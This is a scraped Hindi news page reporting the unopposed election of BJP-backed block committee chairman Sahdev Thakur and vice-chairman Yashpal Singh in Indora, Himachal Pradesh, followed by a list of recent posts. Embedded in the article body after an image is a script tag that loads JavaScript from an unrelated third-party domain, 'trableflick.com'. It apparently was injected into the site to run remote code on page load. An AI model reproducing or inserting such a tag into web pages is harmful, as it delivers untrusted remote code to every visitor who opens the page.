Categories: हिमाचल

विकास खंड इंदौरा में चुने गए BJP समर्थित ब्लॉक समिति अध्यक्ष और उपाध्यक्ष

<p>विकास खंड इंदौरा में रविवार को ब्लॉक समिति अध्यक्ष और उपाध्यक्ष के चुनाव करवाए गए। रविवार दोपहर 12:00 बजे तक कोई भी सदस्य ब्लॉक कार्यालय में नहीं पहुंचा था। इंदौरा क्षेत्र की विधायक रीता धीमान की अगुवाई में भाजपा के नेता सभी सदस्यों के साथ ब्लॉक कार्यालय के सभागार में पहुंच गए। भाजपा का 18 सदस्यों के दावा बिल्कुल सही साबित हुआ। दूसरी तरफ कांग्रेस की तरफ से पहले कोरम में किसी भी तरह का दावा पेश नहीं किया गया और चुनाव से ही पल्ला झाड़ लिया गया।</p>

<p>इंदौरा के इतिहास में ब्लॉक समिति अध्यक्ष के चुनाव में यह पहला मौका था जब पहले ही कोरम में निर्विरोध अध्&zwj;यक्ष और उपाध्&zwj;यक्ष का चुनाव हो गया। अध्यक्ष सहदेव ठाकुर और उपाध्यक्ष यशपाल सिंह को निर्विरोध चुन लिया गया। इस मौके पर एसडीएम इंदौरा सोमिल गौतम, तहसीलदार जनक राज, सहित अन्य अधिकारी उपस्थित रहे। इंदौरा विधानसभा क्षेत्र कांग्रेस के पूर्व प्रत्याशी रहे कमल किशोर ने कहा कि कांग्रेस के पास उम्मीदवार कम होने के कारण कांग्रेस दावा पेश नहीं कर सकी।</p>

<p><img src=”/media/gallery/images/image(2214).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

चंडीगढ़ सेक्टर 42 कॉलेज में हिमाचल की बेटी ने प्रेरणा ने मारी बाजी

चंडीगढ़ सेक्टर-42 के गवर्नमेंट पीजी गर्ल्स कॉलेज में चल रही चुनाव में हिमाचल प्रदेश के…

17 hours ago

संजौली मस्जिद विवाद को लेकर एमसी आयुक्त के कोर्ट में सुनवाई

सबंधित जेई और वक्फ बोर्ड को लगी फटकार, मामले की 5 अक्टूबर को अगली सुनवाई,जेई…

18 hours ago

इंस्पायर मानक अवार्ड के लिए 15 सितंबर तक छात्र करवा सकते है आवेदन

हमीरपुर, कांगड़ा व चंबा के छात्र लेंगे भाग अभी तक कई स्कूलों ने नहीं किया…

18 hours ago

निबंध लेखन में रितिका ने हासिल किया पहला स्थान

भाषा-संस्कृति विभाग जिला कांगडा़ द्वारा जिला स्तरीय राजभाषा हिन्दीं पखवाडे का आयोजन जी.ए.वी स्कूल कांगडा…

18 hours ago

परशुराम चौक बाजार में जलभराव की समस्या से मिली निजात, व्यापारी खुश

पांवटा साहिब- शहर में जल भराव की समस्या से निपटने के लिए नगर निगम द्वारा…

18 hours ago

राज्य में खेल गतिविधियों को बढ़ावा देने के लिए प्रदेश सरकार प्रतिबद्धः केवल पठानिया

धर्मशाला, 6 सितम्बर: उपमुख्य सचेतक व विधायक शाहपुर केवल सिंह पठानिया ने आज शाहपुर विधानसभा…

1 day ago